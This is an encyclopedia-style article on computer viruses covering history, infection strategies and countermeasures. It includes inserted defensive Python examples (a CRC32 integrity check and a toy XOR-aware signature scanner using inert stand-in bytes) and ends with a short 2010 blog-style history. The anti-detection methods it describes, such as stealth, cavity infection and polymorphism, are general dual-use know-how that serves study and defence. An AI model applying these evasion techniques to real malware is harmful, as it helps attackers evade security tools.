The Terminal Man, a science fiction novel by Michael Crichton (1972), told (as a sideline story) of a computer with telephone modem dialing capability, which had been programmed to randomly dial phone numbers until it hit a modem that is answered by another computer. It then attempted to program the answering computer with its own program, so that the second computer would also begin dialing random numbers, in search of yet another computer to program. The program is assumed to spread exponentially through susceptible computers.

The actual term "virus" was first used in David Gerrold's 1972 novel, When HARLIE Was One. In that novel, a sentient computer named HARLIE writes viral software to retrieve damaging personal information from other computers to blackmail the man who wants to turn him off.

 
Virus programs
The Creeper virus was first detected on ARPANET, the forerunner of the Internet, in the early 1970s.[10] Creeper was an experimental self-replicating program written by Bob Thomas at BBN Technologies in 1971.[11] Creeper used the ARPANET to infect DEC PDP-10 computers running the TENEX operating system.[12] Creeper gained access via the ARPANET and copied itself to the remote system where the message, "I'm the creeper, catch me if you can!" was displayed. The Reaper program was created to delete Creeper.[13]

A program called "Elk Cloner" was the first computer virus to appear "in the wild", that is, outside the single computer or lab where it was created.[14] Written in 1981 by Richard Skrenta, it attached itself to the Apple DOS 3.3 operating system and spread via floppy disk.[14][15] This virus, created as a practical joke when Skrenta was still in high school, was injected in a game on a floppy disk. On its 50th use the Elk Cloner virus would be activated, infecting the computer and displaying a short poem beginning "Elk Cloner: The program with a personality."

The first PC virus in the wild was a boot sector virus dubbed (c)Brain, created in 1986 by the Farooq Alvi Brothers in Lahore, Pakistan,[16] reportedly to deter piracy of the software they had written.[17]

Before computer networks became widespread, most viruses spread on removable media, particularly floppy disks. In the early days of the personal computer, many users regularly exchanged information and programs on floppies. Some viruses spread by infecting programs stored on these disks, while others installed themselves into the disk boot sector, ensuring that they would be run when the user booted the computer from the disk, usually inadvertently. PCs of the era would attempt to boot first from a floppy if one had been left in the drive. Until floppy disks fell out of use, this was the most successful infection strategy and boot sector viruses were the most common in the wild for many years.[1]

Traditional computer viruses emerged in the 1980s, driven by the spread of personal computers and the resultant increase in BBS, modem use, and software sharing. Bulletin board-driven software sharing contributed directly to the spread of Trojan horse programs, and viruses were written to infect popularly traded software. Shareware and bootleg software were equally common vectors for viruses on BBS's.[citation needed]

Macro viruses have become common since the mid-1990s. Most of these viruses are written in the scripting languages for Microsoft programs such as Word and Excel and spread throughout Microsoft Office by infecting documents and spreadsheets. Since Word and Excel were also available for Mac OS, most could also spread to Macintosh computers. Although most of these viruses did not have the ability to send infected e-mail, those viruses which did take advantage of the Microsoft Outlook COM interface.[citation needed]

Some old versions of Microsoft Word allow macros to replicate themselves with additional blank lines. If two macro viruses simultaneously infect a document, the combination of the two, if also self-replicating, can appear as a "mating" of the two and would likely be detected as a virus unique from the "parents".[18]

A virus may also send a web address link as an instant message to all the contacts on an infected machine. If the recipient, thinking the link is from a friend (a trusted source) follows the link to the website, the virus hosted at the site may be able to infect this new computer and continue propagating.

Viruses that spread using cross-site scripting were first reported in 2002,[19] and were academically demonstrated in 2005.[20] There have been multiple instances of the cross-site scripting viruses in the wild, exploiting websites such as MySpace and Yahoo.

Infection strategies

In order to replicate itself, a virus must be permitted to execute code and write to memory. For this reason, many viruses attach themselves to executable files that may be part of legitimate programs. If a user attempts to launch an infected program, the virus' code may be executed simultaneously. Viruses can be divided into two types based on their behavior when they are executed. Nonresident viruses immediately search for other hosts that can be infected, infect those targets, and finally transfer control to the application program they infected. Resident viruses do not search for hosts when they are started. Instead, a resident virus loads itself into memory on execution and transfers control to the host program. The virus stays active in the background and infects new hosts when those files are accessed by other programs or the operating system itself.

Nonresident viruses
Nonresident viruses can be thought of as consisting of a finder module and a replication module. The finder module is responsible for finding new files to infect. For each new executable file the finder module encounters, it calls the replication module to infect that file.

Resident viruses
Resident viruses contain a replication module that is similar to the one that is employed by nonresident viruses. This module, however, is not called by a finder module. The virus loads the replication module into memory when it is executed instead and ensures that this module is executed each time the operating system is called to perform a certain operation. The replication module can be called, for example, each time the operating system executes a file. In this case the virus infects every suitable program that is executed on the computer.

Resident viruses are sometimes subdivided into a category of fast infectors and a category of slow infectors. Fast infectors are designed to infect as many files as possible. A fast infector, for instance, can infect every potential host file that is accessed. This poses a special problem when using anti-virus software, since a virus scanner will access every potential host file on a computer when it performs a system-wide scan. If the virus scanner fails to notice that such a virus is present in memory the virus can "piggy-back" on the virus scanner and in this way infect all files that are scanned. Fast infectors rely on their fast infection rate to spread. The disadvantage of this method is that infecting many files may make detection more likely, because the virus may slow down a computer or perform many suspicious actions that can be noticed by anti-virus software. Slow infectors, on the other hand, are designed to infect hosts infrequently. Some slow infectors, for instance, only infect files when they are copied. Slow infectors are designed to avoid detection by limiting their actions: they are less likely to slow down a computer noticeably and will, at most, infrequently trigger anti-virus software that detects suspicious behavior by programs. The slow infector approach, however, does not seem very successful.

Vectors and hosts

Viruses have targeted various types of transmission media or hosts. This list is not exhaustive:

• Binary executable files (such as COM files and EXE files in MS-DOS, Portable Executable files in Microsoft Windows, the Mach-O format in OSX, and ELF files in Linux)
• Volume Boot Records of floppy disks and hard disk partitions
• The master boot record (MBR) of a hard disk
• General-purpose script files (such as batch files in MS-DOS and Microsoft Windows, VBScript files, and shell script files on Unix-like platforms).
• Application-specific script files (such as Telix-scripts)
• System specific autorun script files (such as Autorun.inf file needed by Windows to automatically run software stored on USB Memory Storage Devices).
• Documents that can contain macros (such as Microsoft Word documents, Microsoft Excel spreadsheets, AmiPro documents, and Microsoft Access database files)
• Cross-site scripting vulnerabilities in web applications (see XSS Worm)
• Arbitrary computer files. An exploitable buffer overflow, format string, race condition or other exploitable bug in a program which reads the file could be used to trigger the execution of code hidden within it. Most bugs of this type can be made more difficult to exploit in computer architectures with protection features such as an execute disable bit and/or address space layout randomization.

PDFs, like HTML, may link to malicious code. PDFs can also be infected with malicious code.

In operating systems that use file extensions to determine program associations (such as Microsoft Windows), the extensions may be hidden from the user by default. This makes it possible to create a file that is of a different type than it appears to the user. For example, an executable may be created named "picture.png.exe", in which the user sees only "picture.png" and therefore assumes that this file is an image and most likely is safe, yet when opened runs the executable on the client machine.

An additional method is to generate the virus code from parts of existing operating system files by using the CRC16/CRC32 data. The initial code can be quite small (tens of bytes) and unpack a fairly large virus. This is analogous to a biological "prion" in the way it works but is vulnerable to signature based detection. This attack has not yet been seen "in the wild".

Methods to avoid detection

In order to avoid detection by users, some viruses employ different kinds of deception. Some old viruses, especially on the MS-DOS platform, make sure that the "last modified" date of a host file stays the same when the file is infected by the virus. This approach does not fool anti-virus software, however, especially those which maintain and date Cyclic redundancy checks on file changes.
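
The integrity check that defeats this trick, as an added example (not code from the article): fingerprints are recorded while the files are known to be clean, and a later comparison of size and CRC32 catches an in-place overwrite even though the file's "last modified" date was kept unchanged. The file names, contents and timestamps are constructed samples.

```python
import zlib
from dataclasses import dataclass
from typing import Dict, List, Mapping, Tuple

# A "file" here is (content, mtime); mtime is the "last modified" time in seconds.
FileMap = Mapping[str, Tuple[bytes, int]]


@dataclass(frozen=True)
class Fingerprint:
    size: int
    mtime: int
    crc32: int  # CRC32 of the whole content


def fingerprint(content: bytes, mtime: int) -> Fingerprint:
    return Fingerprint(len(content), mtime, zlib.crc32(content) & 0xFFFFFFFF)


def build_baseline(files: FileMap) -> Dict[str, Fingerprint]:
    """Record a fingerprint of every file while the system is known to be clean."""
    return {path: fingerprint(content, mtime) for path, (content, mtime) in files.items()}


def check_mtime_only(baseline: Dict[str, Fingerprint], files: FileMap) -> List[str]:
    """Naive check that trusts the 'last modified' date: the trick in the text defeats it."""
    return sorted(path for path, (_, mtime) in files.items()
                  if path in baseline and baseline[path].mtime != mtime)


def check_crc(baseline: Dict[str, Fingerprint], files: FileMap) -> List[str]:
    """Integrity check on size and CRC32 of the content; the date is not consulted."""
    changed = []
    for path, (content, mtime) in files.items():
        if path not in baseline:
            continue  # new files need a separate policy; only known files are compared
        now, then = fingerprint(content, mtime), baseline[path]
        if (now.size, now.crc32) != (then.size, then.crc32):
            changed.append(path)
    return sorted(changed)


# Constructed sample files (inert bytes, not real executables). The tail of
# EDITOR.EXE is 64 unused zero bytes, the kind of gap an in-place overwrite fills.
CLEAN_FILES: Dict[str, Tuple[bytes, int]] = {
    "C:/APP/EDITOR.EXE": (b"MZ" + b"\x90" * 30 + b"original code" + b"\x00" * 64, 1262304000),
    "C:/APP/README.TXT": (b"Read me first.\r\n", 1262304000),
}


def tamper_keeping_date(files: FileMap) -> Dict[str, Tuple[bytes, int]]:
    """Simulate the evasion the text describes: the unused tail of EDITOR.EXE is
    overwritten in place (same size) and the old mtime is kept afterwards."""
    tampered = dict(files)
    content, mtime = files["C:/APP/EDITOR.EXE"]
    patched = content[:-64] + b"X" * 64  # same length as before
    tampered["C:/APP/EDITOR.EXE"] = (patched, mtime)  # mtime unchanged
    return tampered


if __name__ == "__main__":
    baseline = build_baseline(CLEAN_FILES)
    after = tamper_keeping_date(CLEAN_FILES)
    print("mtime-only check flags:", check_mtime_only(baseline, after))  # []
    print("CRC32 check flags:     ", check_crc(baseline, after))  # ['C:/APP/EDITOR.EXE']
```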

Some viruses can infect files without increasing their sizes or damaging the files. They accomplish this by overwriting unused areas of executable files. These are called cavity viruses. For example, the CIH virus, or Chernobyl virus, infects Portable Executable files. Because those files have many empty gaps, the virus, which was 1 KB in length, did not add to the size of the file.

Some viruses try to avoid detection by killing the tasks associated with antivirus software before it can detect them.

As computers and operating systems grow larger and more complex, old hiding techniques need to be updated or replaced. Defending a computer against viruses may demand that a file system migrate towards detailed and explicit permission for every kind of file access.

Avoiding bait files and other undesirable hosts
A virus needs to infect hosts in order to spread further. In some cases, it might be a bad idea to infect a host program. For example, many anti-virus programs perform an integrity check of their own code. Infecting such programs will therefore increase the likelihood that the virus is detected. For this reason, some viruses are programmed not to infect programs that are known to be part of anti-virus software. Another type of host that viruses sometimes avoid are bait files. Bait files (or goat files) are files that are specially created by anti-virus software, or by anti-virus professionals themselves, to be infected by a virus. These files can be created for various reasons, all of which are related to the detection of the virus:

• Anti-virus professionals can use bait files to take a sample of a virus (i.e. a copy of a program file that is infected by the virus). It is more practical to store and exchange a small, infected bait file, than to exchange a large application program that has been infected by the virus.
• Anti-virus professionals can use bait files to study the behavior of a virus and evaluate detection methods. This is especially useful when the virus is polymorphic. In this case, the virus can be made to infect a large number of bait files. The infected files can be used to test whether a virus scanner detects all versions of the virus.
• Some anti-virus software employs bait files that are accessed regularly. When these files are modified, the anti-virus software warns the user that a virus is probably active on the system.

Since bait files are used to detect the virus, or to make detection possible, a virus can benefit from not infecting them. Viruses typically do this by avoiding suspicious programs, such as small program files or programs that contain certain patterns of 'garbage instructions'.

A related strategy to make baiting difficult is sparse infection. Sometimes, sparse infectors do not infect a host file that would be a suitable candidate for infection in other circumstances. For example, a virus can decide on a random basis whether to infect a file or not, or a virus can only infect host files on particular days of the week.

Stealth
Some viruses try to trick antivirus software by intercepting its requests to the operating system. A virus can hide itself by intercepting the antivirus software's request to read the file and passing the request to the virus, instead of the OS. The virus can then return an uninfected version of the file to the antivirus software, so that it seems that the file is "clean". Modern antivirus software employs various techniques to counter stealth mechanisms of viruses. The only completely reliable method to avoid stealth is to boot from a medium that is known to be clean.

Self-modification
Most modern antivirus programs try to find virus-patterns inside ordinary programs by scanning them for so-called virus signatures. A signature is a characteristic byte-pattern that is part of a certain virus or family of viruses. If a virus scanner finds such a pattern in a file, it notifies the user that the file is infected. The user can then delete, or (in some cases) "clean" or "heal" the infected file. Some viruses employ techniques that make detection by means of signatures difficult but probably not impossible. These viruses modify their code on each infection. That is, each infected file contains a different variant of the virus.


      

Encryption with a variable key
A more advanced method is the use of simple encryption to encipher the virus. In this case, the virus consists of a small decrypting module and an encrypted copy of the virus code. If the virus is encrypted with a different key for each infected file, the only part of the virus that remains constant is the decrypting module, which would (for example) be appended to the end. In this case, a virus scanner cannot directly detect the virus using signatures, but it can still detect the decrypting module, which still makes indirect detection of the virus possible. Since these would be symmetric keys, stored on the infected host, it is in fact entirely possible to decrypt the final virus, but this is probably not required, since self-modifying code is such a rarity that it may be reason for virus scanners to at least flag the file as suspicious.

An old, but compact, encryption involves XORing each byte in a virus with a constant, so that the exclusive-or operation had only to be repeated for decryption. It is suspicious for a code to modify itself, so the code to do the encryption/decryption may be part of the signature in many virus definitions.
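
An added example (not from the article) of the indirect detection the two paragraphs above describe: a toy signature scanner is run over constructed images of an infected host in which an inert stand-in body is XOR-enciphered with a different one-byte key per file. The plain-body signature never matches the raw file, the constant decryptor stub always does, and because the key is stored beside the stub the scanner can also decipher what follows and match the body. All byte strings, the file layout and the signature names are constructed for the example.

```python
from typing import Dict, List

# Constructed, inert stand-ins for what a scanner sees; none of this is real code.
SAMPLE_BODY = b"<<constructed sample body: find host, append copy, return to host>>"
DECRYPTOR_STUB = b"[[constructed constant decryptor stub]]"

# Two signatures: one cut from the plain body, one cut from the constant stub.
SIGNATURES: Dict[str, bytes] = {
    "sample.body": SAMPLE_BODY[:20],
    "sample.decryptor": DECRYPTOR_STUB[:24],
}


def xor_bytes(data: bytes, key: int) -> bytes:
    """XOR every byte with a one-byte constant; applying it twice restores the input."""
    return bytes(b ^ key for b in data)


def make_infected_image(host: bytes, key: int) -> bytes:
    """Constructed layout of an infected host file: the untouched host program,
    the constant stub, the one-byte key stored beside it, then the enciphered body."""
    return host + DECRYPTOR_STUB + bytes([key]) + xor_bytes(SAMPLE_BODY, key)


def scan(data: bytes, signatures: Dict[str, bytes] = SIGNATURES) -> List[str]:
    """Plain signature scan: names of the known byte patterns found in the data."""
    return sorted(name for name, pattern in signatures.items() if pattern in data)


def scan_with_decryption(data: bytes, signatures: Dict[str, bytes] = SIGNATURES) -> List[str]:
    """Scan the raw file; if the constant stub is present, read the key stored with
    it, decipher what follows and scan that too. This is the indirect detection the
    text describes: the body changes per file, the stub (and the key beside it) does not."""
    hits = set(scan(data, signatures))
    stub_at = data.find(DECRYPTOR_STUB)
    key_at = stub_at + len(DECRYPTOR_STUB)
    if stub_at != -1 and key_at < len(data):
        key = data[key_at]
        recovered_body = xor_bytes(data[key_at + 1:], key)
        hits.update(scan(recovered_body, signatures))
    return sorted(hits)


# Constructed clean host program (inert bytes).
CLEAN_HOST = b"MZ" + b"\x90" * 16 + b"a perfectly ordinary host program"

if __name__ == "__main__":
    for key in (0x21, 0x5A, 0xC3):  # a different key per "infection"
        image = make_infected_image(CLEAN_HOST, key)
        print(hex(key), "raw scan:", scan(image), "with decryption:", scan_with_decryption(image))
```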

Polymorphic code

Polymorphic code was the first technique that posed a serious threat to virus scanners. Just like regular encrypted viruses, a polymorphic virus infects files with an encrypted copy of itself, which is decoded by a decryption module. In the case of polymorphic viruses, however, this decryption module is also modified on each infection. A well-written polymorphic virus therefore has no parts which remain identical between infections, making it very difficult to detect directly using signatures. Antivirus software can detect it by decrypting the viruses using an emulator, or by statistical pattern analysis of the encrypted virus body. To enable polymorphic code, the virus has to have a polymorphic engine (also called mutating engine or mutation engine) somewhere in its encrypted body.[21] See Polymorphic code for technical detail on how such engines operate.

Some viruses employ polymorphic code in a way that constrains the mutation rate of the virus significantly. For example, a virus can be programmed to mutate only slightly over time, or it can be programmed to refrain from mutating when it infects a file on a computer that already contains copies of the virus. The advantage of using such slow polymorphic code is that it makes it more difficult for antivirus professionals to obtain representative samples of the virus, because bait files that are infected in one run will typically contain identical or similar samples of the virus. This will make it more likely that the detection by the virus scanner will be unreliable, and that some instances of the virus may be able to avoid detection.

Metamorphic code

To avoid being detected by emulation, some viruses rewrite themselves completely each time they are to infect new executables. Viruses that utilize this technique are said to be metamorphic. To enable metamorphism, a metamorphic engine is needed. A metamorphic virus is usually very large and complex. For example, W32/Simile consisted of over 14000 lines of Assembly language code, 90% of which is part of the metamorphic engine.[22][23]

Vulnerability and countermeasures

The vulnerability of operating systems to viruses
Just as genetic diversity in a population decreases the chance of a single disease wiping out a population, the diversity of software systems on a network similarly limits the destructive potential of viruses. This became a particular concern in the 1990s, when Microsoft gained market dominance in desktop operating systems and office suites. The users of Microsoft software (especially networking software such as Microsoft Outlook and Internet Explorer) are especially vulnerable to the spread of viruses. Microsoft software is targeted by virus writers due to their desktop dominance, and is often criticized for including many errors and holes for virus writers to exploit. Integrated and non-integrated Microsoft applications (such as Microsoft Office) and applications with scripting languages with access to the file system (for example Visual Basic Script (VBS), and applications with networking features) are also particularly vulnerable.

Although Windows is by far the most popular target operating system for virus writers, viruses also exist on other platforms. Any operating system that allows third-party programs to run can theoretically run viruses. Some operating systems are more secure than others. Unix-based operating systems (and NTFS-aware applications on Windows NT based platforms) only allow their users to run executables within their own protected memory space.

An Internet based experiment revealed that there were cases when people willingly pressed a particular button to download a virus. Security analyst Didier Stevens ran a half year advertising campaign on Google AdWords which said "Is your PC virus-free? Get it infected here!". The result was 409 clicks.[24][25]

As of 2006, there are relatively few security exploits targeting Mac OS X (with a Unix-based file system and kernel).[26] The number of viruses for the older Apple operating systems, known as Mac OS Classic, varies greatly from source to source, with Apple stating that there are only four known viruses, and independent sources stating there are as many as 63 viruses. Many Mac OS Classic viruses targeted the HyperCard authoring environment. The difference in virus vulnerability between Macs and Windows is a chief selling point, one that Apple uses in their Get a Mac advertising.[27] In January 2009, Symantec announced the discovery of a trojan that targets Macs.[28] This discovery did not gain much coverage until April 2009.[28]

While Linux, and Unix in general, has always natively blocked normal users from having access to make changes to the operating system environment, Windows users are generally not. This difference has continued partly due to the widespread use of administrator accounts in contemporary versions like XP. In 1997, when a virus for Linux was released – known as "Bliss" – leading antivirus vendors issued warnings that Unix-like systems could fall prey to viruses just like Windows.[29] The Bliss virus may be considered characteristic of viruses – as opposed to worms – on Unix systems. Bliss requires that the user run it explicitly, and it can only infect programs that the user has the access to modify. Unlike Windows users, most Unix users do not log in as an administrator user except to install or configure software; as a result, even if a user ran the virus, it could not harm their operating system. The Bliss virus never became widespread, and remains chiefly a research curiosity. Its creator later posted the source code to Usenet, allowing researchers to see how it worked.[30]

The role of software development
Because software is often designed with security features to prevent unauthorized use of system resources, many viruses must exploit software bugs in a system or application to spread. Software development strategies that produce large numbers of bugs will generally also produce potential exploits.

Anti-virus software and other preventive measures
Many users install anti-virus software that can detect and eliminate known viruses after the computer downloads or runs the executable. There are two common methods that an anti-virus software application uses to detect viruses. The first, and by far the most common method of virus detection is using a list of virus signature definitions. This works by examining the content of the computer's memory (its RAM, and boot sectors) and the files stored on fixed or removable drives (hard drives, floppy drives), and comparing those files against a database of known virus "signatures". The disadvantage of this detection method is that users are only protected from viruses that pre-date their last virus definition update. The second method is to use a heuristic algorithm to find viruses based on common behaviors. This method has the ability to detect novel viruses that anti-virus security firms have yet to create a signature for.

Some anti-virus programs are able to scan opened files in addition to sent and received e-mails "on the fly" in a similar manner. This practice is known as "on-access scanning". Anti-virus software does not change the underlying capability of host software to transmit viruses. Users must update their software regularly to patch security holes. Anti-virus software also needs to be regularly updated in order to recognize the latest threats.

One may also minimize the damage done by viruses by making regular backups of data (and the operating systems) on different media, that are either kept unconnected to the system (most of the time), read-only or not accessible for other reasons, such as using different file systems. This way, if data is lost through a virus, one can start again using the backup (which should preferably be recent).

If a backup session on optical media like CD and DVD is closed, it becomes read-only and can no longer be affected by a virus (so long as a virus or infected file was not copied onto the CD/DVD). Likewise, an operating system on a bootable CD can be used to start the computer if the installed operating systems become unusable. Backups on removable media must be carefully inspected before restoration. The Gammima virus, for example, propagates via removable flash drives.[31][32]

Recovery methods
Once a computer has been compromised by a virus, it is usually unsafe to continue using the same computer without completely reinstalling the operating system. However, there are a number of recovery options that exist after a computer has a virus. These actions depend on severity of the type of virus.

Virus removal

One possibility on Windows Me, Windows XP, Windows Vista and Windows 7 is a tool known as System Restore, which restores the registry and critical system files to a previous checkpoint. Often a virus will cause a system to hang, and a subsequent hard reboot will render a system restore point from the same day corrupt. Restore points from previous days should work provided the virus is not designed to corrupt the restore files or also exists in previous restore points.[33] Some viruses, however, disable System Restore and other important tools such as Task Manager and Command Prompt. An example of a virus that does this is CiaDoor. However, many such viruses can be removed by rebooting the computer, entering Windows safe mode, and then using system tools.

Administrators have the option to disable such tools from limited users for various reasons (for example, to reduce potential damage from and the spread of viruses). A virus can modify the registry to do the same even if the Administrator is controlling the computer; it blocks all users including the administrator from accessing the tools. The message "Task Manager has been disabled by your administrator" may be displayed, even to the administrator.[citation needed]

Users running a Microsoft operating system can access Microsoft's website to run a free scan, provided they have their 20-digit registration number. Many websites run by anti-virus software companies provide free online virus scanning, with limited cleaning facilities (the purpose of the sites is to sell anti-virus products). Some websites allow a single suspicious file to be checked by many antivirus programs in one operation.

Operating system reinstallation

Reinstalling the operating system is another approach to virus removal. It involves either reformatting the computer's hard drive and installing the OS and all programs from original media, or restoring the entire partition with a clean backup image. User data can be restored by booting from a Live CD, or putting the hard drive into another computer and booting from its operating system with great care not to infect the second computer by executing any infected programs on the original drive; and once the system has been restored precautions must be taken to avoid reinfection from a restored executable file.

These methods are simple to do, may be faster than disinfecting a computer, and are guaranteed to remove any malware. If the operating system and programs must be reinstalled from scratch, the time and effort to reinstall, reconfigure, and restore user preferences must be taken into account. Restoring from an image is much faster, totally safe, and restores the exact configuration to the state it was in when the image was made, with no further trouble.
Dec 6, 2010

The Melissa virus was the big story of 1999. Named after a lap dancer, Melissa was the first major emailing virus. Upon infection, it used Microsoft Outlook to send copies of itself to the first fifty names in the address book. March 1999 saw it spread across the Internet, clogging up email servers everywhere it went.

In 1990, a programmer named Mark Washburn demonstrated a polymorphic virus called 1260. This virus could actually change the structure of its own code, meaning that every time it infected a new system, it looked different while doing the same thing. In effect, this kind of virus "hides" from anti-virus software by wearing disguises.

Michelangelo was the first virus to achieve stardom. It was discovered in 1991, and was predicted to cause incredible amounts of damage when it reached its trigger date, March 6th, 1992 (March 6th is Michelangelo's birthday). If an infected system is booted on March 6th, the virus will erase the hard drive. Despite doomsday warnings made by the press and the industry of "at least five million infected systems at risk," only about 10,000-20,000 computers worldwide were hit by the virus.

The Concept virus was discovered in 1995. Concept is short for "Proof of Concept," and it was designed to show how viruses could be written in the macro language programmed into Microsoft Word. By 2004, roughly 75% of all viruses were macro viruses. It should also be noted that a lot of the viruses today are very easy to avoid. It has practically become obvious when someone is trying to send you one.

The CIH virus, later renamed "Chernobyl," appeared in 1998. This was a very damaging virus that was not only programmed to erase hard drives but also tried to erase BIOS chips. For the first time in history, a virus had managed to actually damage the hardware it was running on. Fortunately, CIH wasn't very good at it, and only damaged a handful of systems. Neither are a lot of the viruses that are programmed today.
